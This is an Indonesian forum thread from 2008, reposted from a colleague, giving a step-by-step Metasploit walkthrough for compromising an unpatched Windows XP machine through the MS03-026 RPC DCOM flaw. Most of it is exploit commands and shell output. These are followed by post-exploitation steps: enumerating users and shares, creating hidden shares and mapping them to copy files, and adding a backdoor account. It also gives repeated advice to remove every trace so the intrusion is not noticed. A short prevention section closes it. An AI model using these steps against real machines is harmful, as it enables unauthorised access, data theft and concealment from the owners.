4 command utktake over window

Topik sebelumnya Topik selanjutnya Go down

4 command utktake over window

Post by budak_linux on Sun Jul 20, 2008 5:59 pm

artiikel milik mas ferry teman kerja q

mhn maaf kl sdh tahu

Bismillahirrahmaanirrahiim

-

---"4 Commands to takeover windows machine" -




-
[*] Starting the Metasploit Framework...



o 8 o o

8 8 8

ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P

8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8

8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8

8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8

..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:

::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::



+ -- --=[ msfconsole v2.7 [157 exploits - 76 payloads]


msf > use msrpc_dcom_ms03_026

msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind

PAYLOAD -> win32_bind

msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 172.16.0.5

RHOST -> 172.16.0.5

msf msrpc_dcom_ms03_026(win32_bind) > exploit

[*] Starting Bind Handler.

[*] Sending request...

[*] Got connection from 172.16.0.3:3766 <-> 172.16.0.5:4444


Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.


C:\WINDOWS\system32>



Yup 4 command dalam metasploit digunakan untuk exploitasi windows machine

(dalam hitungan detik saja bukan ;p ).

Begitulah gambaran singkat nya.

Upzz tapi kurang menarik tanpa kita bahas lebih dalam

Sip ok mari kita bahas satu persatu biar lebih menarik..


-Read This article on below carefully!!-


-Perhatian & Pemberitahuan !! :

=================================-


-Artikel ini hanya ditujukan sebagai informasi & pengetahuan untuk siapa

saja yang membaca artikel ini. So pergunakan informasi ini sebaik

mungkin.jangan sampe disalahgunakan. Segala akibat dari penyalahgunaan

artikel ini merupakan tanggung jawab pelaku.

Penulis tidak bertanggungjawab atas penyalahgunaan artikel ini. -


-Dipersilahkan memperbanyak artikel ini dengan ijin ataupun tanpa izin

dari penulis dengan tujuan non profit, dengan tetap mencantumkan kredit

atas penulis.

-


----===== Pengantar =====----

Sebenarnya artikel ini sudah agak basi dan kurang berbobot, penulis

menyadari akan hal ini akan tetapi tidak ada salahnya penulis mencoba

share dengan sedikit modifikasi untuk pembaca sehingga semoga bermanfaat.

amien...


Note : bagi anda yang sudah merasa jago silahkan quit cepat cepat dari

artikel ini daripada buat boring :p.dan silahkan buat artikel yang jauh

lebih bagus dari ini!!

-because i am just ordinary human | No body is perfect..-


----===== Isi =====----


-1. Apa dan bagaimana ?-

-Artikel ini merupakan bagaimana cara mendapatkan mesini windows

alias take over windows (xP or win2000 ) menggunakan metasploit dengan

memakai exploit msrpc_dcom_ms03_026, serta nanti kita akan bermain2

di cmd target saat kita sudah take over mesin wind* itu dengan akses

tertinggi (adminstrator, layaknya root di linux/*nix ;p).-


-Open and Explore your mind !! -




2. Tool and Peripheral -:




-attacker : - PC Desktop OS Windows

- nama komputer fl3xu5

- IP address 172.16.0.3

- metasploit v2.7 (http://metasploit.com)

- scanner (terserah).


target : - laptop dengan OS Windows XPSP1 :p

- nama komputer kidz

- IP address 172.16.0.5


peripheral lain

- cross cable , UnShielded Twisted Pair , dengan rj45

*yup percobaan kali ini dilakukan dengan peer to peer

mumpung ada pinjeman laptop ;p

- iringan winamp with Dream theater "Strange dejavu" ;p-




-Ok langsung ajah ya biar ga kelamaan

-

3. -Mulai lakukan serangan ;p Lets Started !!-

-3.1. Scanning-

OK seperti pada umumnya yang dilakukan dalam proses hacking

adalah scanning proses :

pake nmap aja biar cepet dan praktis




G:\> nmap 172.16.0.5


Starting nmap 3.48 ( http://www.insecure.org/nmap/ ) at2004-03-23 23:00WIT

Interesting ports on 172.16.0.5:

(The 1652 ports scanned but not shown below are in state: closed)

PORT STATE SERVICE

135/tcp open msrpc

139/tcp open netbios-ssn

445/tcp open microsoft-ds

1025/tcp open NFS-or-IIS

5000/tcp open UPnP-




wew ternyata port 134 nya terbuka ;p moga moga aja bisa di exploitasi

rpc nya (berdoa aja duluw ;p)


-3.2 exploitasi System via port 135 yang kebuka tadi.-

Kali ini kita pake metasploit versi2.7, bisa didwonload di situs resmi

nya http://metasploit.com. Bisa juga pake exploit lain spt KAHT2 dll.






-
[*] Starting the Metasploit Framework...



o 8 o o

8 8 8

ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P

8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8

8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8

8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8

..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:

::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::



+ -- --=[ msfconsole v2.7 [157 exploits - 76 payloads]


msf > use msrpc_dcom_ms03_026

msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind

PAYLOAD -> win32_bind

msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 172.16.0.5

RHOST -> 172.16.0.5

msf msrpc_dcom_ms03_026(win32_bind) > exploit


[*] Starting Bind Handler.


[*] Sending request...


[*] Got connection from 172.16.0.3:3766 <-> 172.16.0.5:4444


Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.


C:\WINDOWS\system32> <-- ok, kita berhasil masuk ke cmd target:)-



-Point penting yang perlu diperhatikan adalah

- target IP : 172.16.0.5

- IP attacker : 172.16.0.3

- port yang digunakan untuk koneksi:

port 3766 <-- portnya attacker utk koneksi dng target

port 4444 <-- portnya target.-


YUp artinya kita dah takeover mesin target itu dan kedudukan kita

sebagai administrator (dengan akses tertinggi ;p)

nah enaknya ngapain ya kalo dah takeover gini??

yuuukk kita coba explore2 yuu

*laykanya kita explore dengan cmd di mesin kita sendiri ;p tentunya

dengan DOS command...

-jangan lupa tuk diingat

attacker : - IP address 172.16.0.3

target : - IP address 172.16.0.5-

Mulai yuu ;p

-3.3 Analisa dengan netstat -a-

- Pada mesin attacker :




G:\Documents and Settings\fl3xu5>netstat -a


Active Connections


Proto Local Address Foreign Address State

TCP fl3xu5:smtp fl3xu5:0 LISTENING

TCP fl3xu5:finger fl3xu5:0 LISTENING

TCP fl3xu5:http fl3xu5:0 LISTENING

TCP fl3xu5:pop3 fl3xu5:0 LISTENING

TCP fl3xu5:epmap fl3xu5:0 LISTENING

TCP fl3xu5:microsoft-ds fl3xu5:0 LISTENING

TCP fl3xu5:2869 fl3xu5:0 LISTENING

TCP fl3xu5:6017 fl3xu5:0 LISTENING

TCP fl3xu5:1028 fl3xu5:0 LISTENING

TCP fl3xu5:3306 fl3xu5:0 LISTENING

TCP fl3xu5:netbios-ssn fl3xu5:0 LISTENING

TCP fl3xu5:3766 172.16.0.5:4444 ESTABLISHED

UDP fl3xu5:microsoft-ds *:*

UDP fl3xu5:isakmp *:*

UDP fl3xu5:1025 *:*

UDP fl3xu5:1026 *:*

UDP fl3xu5:1049 *:*

UDP fl3xu5:1050 *:*

UDP fl3xu5:1051 *:*

UDP fl3xu5:1052 *:*

UDP fl3xu5:1053 *:*

UDP fl3xu5:1054 *:*

UDP fl3xu5:1055 *:*

UDP fl3xu5:1056 *:*

UDP fl3xu5:4500 *:*

UDP fl3xu5:ntp *:*

UDP fl3xu5:1900 *:*

UDP fl3xu5:ntp *:*

UDP fl3xu5:1027 *:*

UDP fl3xu5:1900 *:*

UDP fl3xu5:4293 *:*

UDP fl3xu5:ntp *:*

UDP fl3xu5:netbios-ns *:*

UDP fl3xu5:netbios-dgm *:*-

budak_linux
Talker
Talker

Male
Jumlah posting : 98
Location : PalemBAng Di Atas Genteng SUmatera
Registration date : 04.07.08

Lihat profil user http://www.ilmucom.co.cc

Kembali Ke Atas Go down

Re: 4 command utktake over window

Post by budak_linux on Sun Jul 20, 2008 6:00 pm

nyambung

- Pada mesin target (cmd target) ketik :




C:\WINDOWS\system32>netstat -a

Active Connections


Proto Local Address Foreign Address State

TCP kidz:epmap kidz:0 LISTENING

TCP kidz:microsoft-ds kidz:0 LISTENING

TCP kidz:1025 kidz:0 LISTENING

TCP kidz:1032 kidz:0 LISTENING

TCP kidz:gds_db kidz:0 LISTENING

TCP kidz:4444 kidz:0 LISTENING

TCP kidz:5000 kidz:0 LISTENING

TCP kidz:7551 kidz:0 LISTENING

TCP kidz:netbios-ssn kidz:0 LISTENING

TCP kidz:1370 kidz:0 LISTENING

TCP kidz:1382 kidz:0 LISTENING

TCP kidz:1445 kidz:0 LISTENING

TCP kidz:1454 kidz:0 LISTENING

TCP kidz:1699 kidz:0 LISTENING

TCP kidz:1866 kidz:0 LISTENING

TCP kidz:3859 kidz:0 LISTENING

TCP kidz:4444 172.16.0.3:3766 ESTABLISHED

UDP kidz:epmap *:*

UDP kidz:microsoft-ds *:*

UDP kidz:isakmp *:*

UDP kidz:1026 *:*

UDP kidz:1027 *:*

UDP kidz:1028 *:*

UDP kidz:1581 *:*

UDP kidz:1582 *:*

UDP kidz:1583 *:*

UDP kidz:1584 *:*

UDP kidz:1585 *:*

UDP kidz:1586 *:*

UDP kidz:1587 *:*

UDP kidz:1588 *:*

UDP kidz:1589 *:*

UDP kidz:7550 *:*

UDP kidz:ntp *:*

UDP kidz:1033 *:*

UDP kidz:1900 *:*

UDP kidz:ntp *:*

UDP kidz:netbios-ns *:*

UDP kidz:netbios-dgm *:*

UDP kidz:1900 *:*-





-Coba perhatikan dari hasil netstat -a bahwa :

Proto = artinya menunjukkan protokol yang digunakan

Local Address = address lokal komputer yang bersangkutan (dalam

hal ini adalah kidz), dan port yang digunakannya.

Foreign Address = menunjukkan address asing yang sedang melakukan

koneksi.

State = menunjukkan status koneksi.


Nah coba perhatikan diatas,

TCP kidz:4444 172.16.0.3:3766 ESTABLISHED

artinya bahwa kidz (komputer target) menggunakan port 4444 untuk

terkoneksi dengan IP 172.16.0.3 (Ip attacker) dengan port attacker

adalah 3766 dimana status keduanya adalah ESTABLISHED (berhasil

terkoneksi ).

Hal ini cocok dengan attacker :

TCP fl3xu5:3766 172.16.0.5:4444 ESTABLISHED

-

Coba bandingkan dengan kondisi target sebelum terexploitasi:




C:\WINDOWS\system32>netstat -a

Active Connections


Proto Local Address Foreign Address State

TCP kidz:epmap kidz:0 LISTENING

TCP kidz:microsoft-ds kidz:0 LISTENING

TCP kidz:1025 kidz:0 LISTENING

TCP kidz:1032 kidz:0 LISTENING

TCP kidz:gds_db kidz:0 LISTENING

TCP kidz:4444 kidz:0 LISTENING

TCP kidz:5000 kidz:0 LISTENING

TCP kidz:7551 kidz:0 LISTENING

TCP kidz:netbios-ssn kidz:0 LISTENING

TCP kidz:1370 kidz:0 LISTENING

TCP kidz:1382 kidz:0 LISTENING

TCP kidz:1445 kidz:0 LISTENING

TCP kidz:1454 kidz:0 LISTENING

TCP kidz:1699 kidz:0 LISTENING

TCP kidz:1866 kidz:0 LISTENING

TCP kidz:3859 kidz:0 LISTENING

UDP kidz:epmap *:*

UDP kidz:microsoft-ds *:*

UDP kidz:isakmp *:*

UDP kidz:1026 *:*

UDP kidz:1027 *:*

UDP kidz:1028 *:*

UDP kidz:1581 *:*

UDP kidz:1582 *:*

UDP kidz:1583 *:*

UDP kidz:1584 *:*

UDP kidz:1585 *:*

UDP kidz:1586 *:*

UDP kidz:1587 *:*

UDP kidz:1588 *:*

UDP kidz:1589 *:*

UDP kidz:7550 *:*

UDP kidz:ntp *:*

UDP kidz:1033 *:*

UDP kidz:1900 *:*

UDP kidz:ntp *:*

UDP kidz:netbios-ns *:*

UDP kidz:netbios-dgm *:*

UDP kidz:1900 *:*-





silahkan perbedaanya , jelas bukan


4. Explorasi lebih dalam di mesin target ;p-




C:\WINDOWS\system32>cd\

cd\

C:\>dir /a <--- tampilin isi direkory

dir /a

Volume in drive C is systemZ

Volume Serial Number is 634Q-5H3W


Directory of C:\


12/06/2007 01:36 pagi <DIR> $VAULT$.AVG

03/04/2003 01:57 pagi 0 AUTOEXEC.BAT

06/03/2003 04:55 sore 193 boot.ini

06/02/2003 01:57 sore 0 CONFIG.SYS

22/05/2007 05:52 sore <DIR> Documents and Settings

26/06/2007 11:20 pagi 255.876.614 hiberfil.sys

18/04/2007 07:27 pagi <DIR> Inprise

05/02/2003 01:57 sore 0 IO.SYS

09/05/2003 01:57 pagi 0 MSDOS.SYS

27/03/2002 04:08 sore 35.487 NTDETECT.COM

23/05/2002 08:05 sore 343.598 ntldr

28/02/2007 11:20 pagi 453.365.387 pagefile.sys

23/01/2007 03:54 sore 14.243 PDOXUSRS.NET

29/05/2007 12:22 pagi <DIR> Program Files

23/03/2007 05:55 pagi <DIR> RECYCLER

04/05/2003 02:02 pagi <DIR> System Volume Information

22/02/2007 11:39 pagi <DIR> WINDOWS

10 File(s) 564.767.298 bytes

7 Dir(s) 4.387.087.073 bytes free-





nah coba ah liat ada berapa OS nih di PC target ...caranya ??




C:\>type boot.ini

type boot.ini

[boot loader]

timeout=6

default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

[operating systems]

multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect-



wah ternyata cuma 1 oS yaitu windows...


nah ada direktory program files tuh, coba intip yuu ;p




C:\>cd program files

cd program files


C:\Program Files>dir /a

dir /a

Volume in drive C is systemZ

Volume Serial Number is 634Q-5H3W


Directory of C:\Program Files


23/09/2007 12:22 pagi <DIR> .

12/09/2007 12:22 pagi <DIR> ..

21/09/2007 10:57 pagi <DIR> Adobe

13/09/2007 02:46 sore <DIR> BORGChat

18/09/2007 07:25 sore <DIR> Borland

21/09/2007 07:21 sore <DIR> Common Files

12/01/2003 01:54 pagi <DIR> ComPlus Applications

13/01/2003 04:11 pagi <DIR> Grisoft

08/09/2007 10:57 pagi <DIR> InstallShield Installation Information

15/01/2003 01:56 pagi <DIR> Internet Explorer

05/09/2007 07:26 sore <DIR> JavaSoft

14/01/2003 02:38 pagi <DIR> K-Lite Codec Pack

15/01/2003 01:53 pagi <DIR> Messenger

04/09/2007 09:51 pagi <DIR> Microsoft ActiveSync

15/01/2003 01:58 pagi <DIR> microsoft frontpage

05/09/2007 09:51 pagi <DIR> Microsoft Office

06/09/2007 09:51 pagi <DIR> Microsoft.NET

18/09/2007 01:35 sore <DIR> mIRC

22/01/2003 01:55 pagi <DIR> Movie Maker

29/01/2003 01:53 pagi <DIR> MSN

15/01/2003 01:53 pagi <DIR> MSN Gaming Zone

19/01/2003 01:55 pagi <DIR> NetMeeting

17/01/2003 01:56 pagi <DIR> Online Services

15/09/2007 12:14 pagi <DIR> Opera

13/01/2003 01:55 pagi <DIR> Outlook Express

18/01/2003 02:03 pagi <DIR> Uninstall Information

14/09/2007 08:37 sore <DIR> Winamp

18/09/2007 05:53 sore <DIR> Windows Media Player

14/01/2003 01:53 pagi <DIR> Windows NT

04/09/2007 03:14 sore <DIR> WindowsUpdate

05/09/2007 10:17 pagi <DIR> WinRAR

06/09/2007 10:20 pagi <DIR> XemiComputers

13/01/2003 01:58 pagi <DIR> xerox

05/09/2007 11:45 sore <DIR> Yahoo!

0 File(s) 0 bytes

34 Dir(s) 5.319.032.098 bytes free-

budak_linux
Talker
Talker

Male
Jumlah posting : 98
Location : PalemBAng Di Atas Genteng SUmatera
Registration date : 04.07.08

Lihat profil user http://www.ilmucom.co.cc

Kembali Ke Atas Go down

Re: 4 command utktake over window

Post by budak_linux on Sun Jul 20, 2008 6:00 pm

apalagi ya ?? oiya iseng buat direktory yuu ..ups tapi cepet2

dihapus ya..biar ga ketahuan segera hapus jejak




C:\>mkdir test

mkdir test

C:\>dir /a



Volume in drive C is systemZ

Volume Serial Number is 634Q-5H3W


Directory of C:\


12/06/2007 01:36 pagi <DIR> $VAULT$.AVG

03/04/2003 01:57 pagi 0 AUTOEXEC.BAT

06/03/2003 04:55 sore 193 boot.ini

06/02/2003 01:57 sore 0 CONFIG.SYS

22/05/2007 05:52 sore <DIR> Documents and Settings

26/06/2007 11:20 pagi 255.876.614 hiberfil.sys

18/04/2007 07:27 pagi <DIR> Inprise

05/02/2003 01:57 sore 0 IO.SYS

09/05/2003 01:57 pagi 0 MSDOS.SYS

27/03/2002 04:08 sore 35.487 NTDETECT.COM

23/05/2002 08:05 sore 343.598 ntldr

28/02/2007 11:20 pagi 453.365.387 pagefile.sys

23/01/2007 03:54 sore 14.243 PDOXUSRS.NET

29/05/2007 12:22 pagi <DIR> Program Files

23/03/2007 05:55 pagi <DIR> RECYCLER

04/05/2003 02:02 pagi <DIR> System Volume Information

24/09/2007 01:07 sore <DIR> test

22/02/2007 11:39 pagi <DIR> WINDOWS

10 File(s) 564.767.298 bytes

7 Dir(s) 4.387.087.073 bytes free

asyik dah berhasil tuh membuat direktori test ;p.. nih :

24/09/2007 01:07 sore <DIR> test-




buruan ah hapus, biar ga ketahuan nyusup :p




C:\>rmdir test

rmdir test

C:\> dir /a

dir /a

Volume in drive C is systemZ

Volume Serial Number is 634Q-5H3W


Directory of C:\


12/06/2007 01:36 pagi <DIR> $VAULT$.AVG

03/04/2003 01:57 pagi 0 AUTOEXEC.BAT

06/03/2003 04:55 sore 193 boot.ini

06/02/2003 01:57 sore 0 CONFIG.SYS

22/05/2007 05:52 sore <DIR> Documents and Settings

26/06/2007 11:20 pagi 255.876.614 hiberfil.sys

18/04/2007 07:27 pagi <DIR> Inprise

05/02/2003 01:57 sore 0 IO.SYS

09/05/2003 01:57 pagi 0 MSDOS.SYS

27/03/2002 04:08 sore 35.487 NTDETECT.COM

23/05/2002 08:05 sore 343.598 ntldr

28/02/2007 11:20 pagi 453.365.387 pagefile.sys

23/01/2007 03:54 sore 14.243 PDOXUSRS.NET

29/05/2007 12:22 pagi <DIR> Program Files

23/03/2007 05:55 pagi <DIR> RECYCLER

04/05/2003 02:02 pagi <DIR> System Volume Information

22/02/2007 11:39 pagi <DIR> WINDOWS

10 File(s) 564.767.298 bytes

7 Dir(s) 4.387.087.073 bytes free-




nah sekarang maen2 yang berhubungan dengan networking yuu

biar tambah asyik...

coba ah liat apa aja yang di share :




C:\> d:

D:\>net share

net share


Share name Resource Remark


----------------------------------------------------------------

IPC$ Remote IPC

D$ D:\ Default share

F$ F:\ Default share

ADMIN$ C:\WINDOWS Remote Admin

C$ C:\ Default share

E$ E:\ Default share

The command completed successfully.-




nah ternyata masih default tuh share share an nya..ada IPC$,D$,

F$,ADMIN$,C$,E$.



Coba explore direktory lain ah ...;p




D:\>dir /a

dir /a

Volume in drive D is konami

Volume Serial Number is 2876-28BY


Directory of D:\


14/03/2007 01:38 pagi <DIR> System Volume Information

18/05/2007 12:23 sore <DIR> funny

05/09/2007 12:31 sore <DIR> Recycled

04/03/2007 07:43 sore <DIR> installerzzz

05/05/2007 12:20 sore <DIR> Templates

19/01/2007 04:44 sore 23 tutut.txt

05/05/2007 12:11 pagi <DIR> $VAULT$.AVG

1 File(s) 23 bytes

6 Dir(s) 4.584.785.237 bytes free-




upzz ada direktory installer, kayaknya ini isi nya installer2/

software2 buat windows ya?? ga tahu juga ding, liat aja yuu :p

tapi enaknya coba di share aja biar lebih enak dan menantang ;p





D:\>net share i$=d:/installerzzz

net share i$=d:/installerzzz

i$ was shared successfully.-




catatan : option $ digunakan supaya share nya di hidden biar ga

keliatan ;p



Coba liat dah berhasil di share blom yakk...




D:\>net share

net share


Share name Resource Remark


-----------------------------------------------------------------

IPC$ Remote IPC

D$ D:\ Default share

i$ d:\installerzzz

F$ F:\ Default share

ADMIN$ C:\WINDOWS Remote Admin

C$ C:\ Default share

E$ E:\ Default share

The command completed successfully.-




asyik dah berhasil di share tuh dengan share name i$ ;p

nah cepetan copi or liat2 tuh yang telah di share tadi, coz

biar ga kelamaan di share..Nah kalo dah selese, segera di unshare

ya ;p (sekali lagi kita maen bersih, be invisible ;p)

cara nya gmn dunk unshare??




D:\>net share i$ /delete

net share i$ /delete

i$ was deleted successfully.-





Sip dah diunshare tuh..masa sih?? yukk kita lihat bareng:




D:\>net share

net share


Share name Resource Remark


--------------------------------------------------------------------

IPC$ Remote IPC

D$ D:\ Default share

F$ F:\ Default share

ADMIN$ C:\WINDOWS Remote Admin

C$ C:\ Default share

E$ E:\ Default share

The command completed successfully.-




oiya sip dah di unshare...


wah enaknya liat yuu siapa aja user yang ada di PC target..




D:\>net user

net user


User accounts for \\


----------------------------------------------------------------------

Administrator Guest HelpAssistant

kidz SUPPORT_388945a0

The command completed with one or more errors.-




nah tuh banyak user ternyata disitu, sekarang kita coba lihat

properties dari salah satu user nya,misal user administrator.




D:\>net user Administrator

net user Administrator

User name Administrator

Full Name

Comment Built-in account for administering the computer/domain

User's comment

Country code 000 (System Default)

Account active Yes <---- acount nya aktif ;p

Account expires Never

Password last set 1/1/2003 8:51 AM

Password expires Never

Password changeable 1/1/2003 8:51 AM

Password required Yes

User may change password Yes


Workstations allowed All

Logon script

User profile

Home directory

Last logon 9/20/2007 5:48 PM


Logon hours allowed All


Local Group Memberships *Administrators <- group Administrators

Global Group memberships *None

The command completed successfully.-




Gimana kalo kita add user?? bisa ga ya??coba yuu ;p




D:\>net user tamu 12345 /add

net user tamu tamu /add

The command completed successfully.

budak_linux
Talker
Talker

Male
Jumlah posting : 98
Location : PalemBAng Di Atas Genteng SUmatera
Registration date : 04.07.08

Lihat profil user http://www.ilmucom.co.cc

Kembali Ke Atas Go down

Re: 4 command utktake over window

Post by budak_linux on Sun Jul 20, 2008 6:01 pm

artinya kita menambahkan user tamu dengan password 12345





D:\>net user

net user


User accounts for \\


----------------------------------------------------------------------

Administrator Guest HelpAssistant

kidz SUPPORT_388945a0 tamu

The command completed with one or more errors.




Sipp dah berhasil di create tuh user tamu ;p


Nah berikutnya terserah mau jadikan user tamu itu masuk ke group

administrators, terus kita pake acount tersebut buat connect back

dan seterusnya..Silahkan saaja dan kembangin sendiri ya ;p

Ok, kalo dah ga kepake kita hapus yuu user tamu itu biar ga ketahuan

kalo kita nyusup ;p





D:\>net user tamu /delete

net user tamu /delete

The command completed successfully.


D:\>net user

net user


User accounts for \\


----------------------------------------------------------------------

Administrator Guest HelpAssistant

kidz SUPPORT_388945a0

The command completed with one or more errors.




Sip dah kehapus user tamu tsb ;p


Kita explore Drive lain yuuu..masih lom cape khan ;-P hehehe





D:\>f:


F:\>dir /a

dir /a

Volume in drive F is high-Q

Volume Serial Number is 190T-1958


Directory of F:\


19/09/2007 06:39 sore <DIR> FOUND.000

09/09/2007 01:38 pagi <DIR> System Volume Information

07/09/2007 12:31 sore <DIR> Recycled

14/09/2007 07:50 sore <DIR> film

08/09/2007 07:50 sore <DIR> SongZ

0 File(s) 0 bytes

5 Dir(s) 5.067.175.298 bytes free







F:\>cd SongZ

cd SongZ


F:\>SongZ>dir /a

dir /a

Volume in drive F is high-Q

Volume Serial Number is 190T-1958


Directory of F:\SongZ


16/03/2007 07:50 sore <DIR> .

11/07/2007 07:50 sore <DIR> ..

05/02/2003 06:16 pagi <DIR> Indonesia

07/09/2003 06:18 pagi <DIR> Barat

19/02/2007 07:51 sore <DIR> Lirik Lagu

0 File(s) 0 bytes

5 Dir(s) 5.030.287.287 bytes free




Coba kita share yuuk Folder SongZ yang ada di f:\, abis itu kita

mapping di PC kita ;p asyi bukan





F:\SongZ>net share b$=f:\SongZ

net share b$=f:\SongZ

b$ was shared successfully


F:\SongZ>net share

net share


Share name Resource Remark


-----------------------------------------------------------------------

IPC$ Remote IPC

D$ D:\ Default share

b$ f:\SongZ

F$ F:\ Default share

ADMIN$ C:\WINDOWS Remote Admin

C$ C:\ Default share

E$ E:\ Default share

The command completed successfully.




yup dah si share tuh f:\SongZ dgn nama share nya b$.

OK berarti kita tinggal mapping aja ke PC kita, seolah olah kita

punya partisi hardisk baru. misal kita punya partisi c,d,e,f,g maka

biasa nya kalo kita telah berhasil mapping maka akan tampak partisi

Z di PC kita. untuk mapping ke dua maka akan tampak mapping point

berikutnya yaitu Y. maaping point tersebut sama seperti saat kita

melakukan "map network drive" suatu folder yang di share PC lain.

yukk langsung kita coba aja ;p

kita buka PC kita :





G:\Documents and Settings\fl3xu5>net use Z: \\172.16.0.5\b$

The command completed successfully.


G:\Documents and Settings\fl3xu5>net use

New connections will not be remembered.


Status Local Remote Network


-----------------------------------------------------------------

OK Z: \\172.16.0.5\b$ Microsoft Windows Network



The command completed successfully.




Sip.. dah berhasil di mapping ke Z:

Silahkan cek di MY komputer kita maka akan nampak drive Z tersebut

yang berisi file sharing \\172.16.0.5\b$

jika sudah berhasil maka bisa kita copy file share dari PC target ;p

teknik ini digunakan untuk memudahkan kita dalam mengakses karena

kita tidak perlu mem browse PC target, melainkan kita tinggal klik

drive Z yang telah menjadi mapping point tersebut.;p

*laykanya kita mengakses drive PC kita ;p

Nah kalo dah tidak diperlukan segera "disconnect map drive" tadi,

tujuanya agar tidak di ketahui kalo kita dah nge share dan nge map

file dari PC target tersebut. (Ingat, kita maen bersih yak ;p)

caranya :





G:\Documents and Settings\fl3xu5>net use Z: /delete

Z: was deleted successfully.


G:\Documents and Settings\fl3xu5>net use

New connections will not be remembered


There are no entries in the list.




Nampak kalo Z: sudah tidak ada, artinya sudah tidak ada mapping

point di PC kita..

Supaya aman jangan lupa kita unshare b$ dari PC target tadi, caranya :




F:\SongZ>net share b$ /delete

net share b$ /delete

b$ was deleted successfully




Cek yuu dah ter unshare blom b$ tadi :




F:\SongZ>net share

net share


Share name Resource Remark


-----------------------------------------------------------

IPC$ Remote IPC

D$ D:\ Default share

F$ F:\ Default share

ADMIN$ C:\WINDOWS Remote Admin

C$ C:\ Default share

E$ E:\ Default share

The command completed successfully.





----===== Analisa =====---

-Dalam kasus ini PC target merupakan PC dengan OS windows dengan default

installation artinya smuwa konfigurasi masih default, belum dilakukan

patching terhadap OS windows tersebut. Dan juga tidak dilakukan installasi

terhadapa Antivirus or firewall. Meskipun antiviurs dan firewall bukan

satu cara yang bagus untuk men secure tapi paling tidak ada beberapa

yang cocok untuk melakukan pencegahan terhadap exploit msrpcdcom ini.


----===== Pencegahan =====---

-Salah satu pencegahan yang bisa dilakukan adalah dengan menginstall

AV dan firewall serta lakukan lah patching, sehingga mencegah

adanya intruder/attacker via port 135 tersebut dengan memanfaatkan

rpcdcom tadi.


Nah penulis coba lakukan filtering packet yang ada di TCP/IP properties

yaitu dengan

Pilih network connection --> klik kanan pada LAN --> properties-->

TCP/IP --> properties --> advanced --> options --> TCP/IP Filtering

--> properties --> Enable TCP/IP filtering --> klik permit only -->

add --> masukkan port 80 --> ok --ok -->ok --> ok.

Setelah melakukan filtering tadi, penulis coba exploitasi dengan cara

yang sama via port 135 tadi, dan hasilnya tidak berhasil terexploitasi.

padahal tanpa install AV dan firewall sebelumnya.

Akan tetapi, banyak efect yang terjadi setelah melakukan filtering tadi.

seperti tidak bisa sharing file.

berdasarkan analisa penulis, tidak berhasilnya exploitasi tadi

dikarenakan port 135 tertutup, dimana port 135 digunakan sebagai

servis yang berhubungan dengan file sharing tadi.






--===== Penutup =====---


--->> Info tambahan

-- untuk informasi lebih tentang metasploit silahkan ke

http://metasploit.com, dan gunakan ? pada msf console.

- info DOS command, ketik help pada command prompt untuk mengetahui

lebih dalam command2 apa saja yang digunaakn dalam windows (DOS)



- Silahkan menganalisa lebih dalam tentang netstat, dengan ketik

netstat /? pada cmd.

Coba saya berikan sampel nya :






G:\Documents and Settings\fl3xu5>net

The syntax of this command is:



NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |

HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |

SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]



G:\Documents and Settings\fl3xu5>net localgroup /?

The syntax of this command is:



NET LOCALGROUP

[groupname [/COMMENT:"text"]] [/DOMAIN]

groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN]

groupname name [...] {/ADD | /DELETE} [/DOMAIN]



G:\Documents and Settings\fl3xu5>net share /?

The syntax of this command is:



NET SHARE

sharename

sharename=drive:path [/GRANT:user,[READ | CHANGE | FULL]]

[/USERS:number | /UNLIMITED]

[/REMARK:"text"]

[/CACHE:Manual | Documents| Programs | None ]

sharename [/USERS:number | /UNLIMITED]

[/REMARK:"text"]

[/CACHE:Manual | Documents | Programs | None]

{sharename | devicename | drive:path} /DELETE



G:\Documents and Settings\fl3xu5>net start /?

The syntax of this command is:



NET START

[service]



G:\Documents and Settings\fl3xu5>net stop /?

The syntax of this command is:



NET STOP

service



G:\Documents and Settings\fl3xu5>net use /?

The syntax of this command is:



NET USE

[devicename | *] [\\computername\sharename[\volume] [password | *]]

[/USER:[domainname\]username]

[/USER:[dotted domain name\]username]

[/USER:[username@dotted domain name]

[/SMARTCARD]

[/SAVECRED]

[[/DELETE] | [/PERSISTENT:{YES | NO}]]


NET USE {devicename | *} [password | *] /HOME


NET USE [/PERSISTENT:{YES | NO}]




G:\Documents and Settings\fl3xu5>net user /?

The syntax of this command is:



NET USER

[username [password | *] [options]] [/DOMAIN]

username {password | *} /ADD [options] [/DOMAIN]

username [/DELETE] [/DOMAIN]



G:\Documents and Settings\fl3xu5>net view /?

The syntax of this command is:



NET VIEW

[\\computername [/CACHE] | /DOMAIN[:domainname]]

NET VIEW /NETWORK:NW [\\computername]





--->> Aware !!-

-To All, mohon diperhatikan sisi security dari windows, salah satunya

bug rpcdcom tersebut. dan bug bug lain seperti port 139 yang bisa

di exploitasi dengan lsass.. dsb

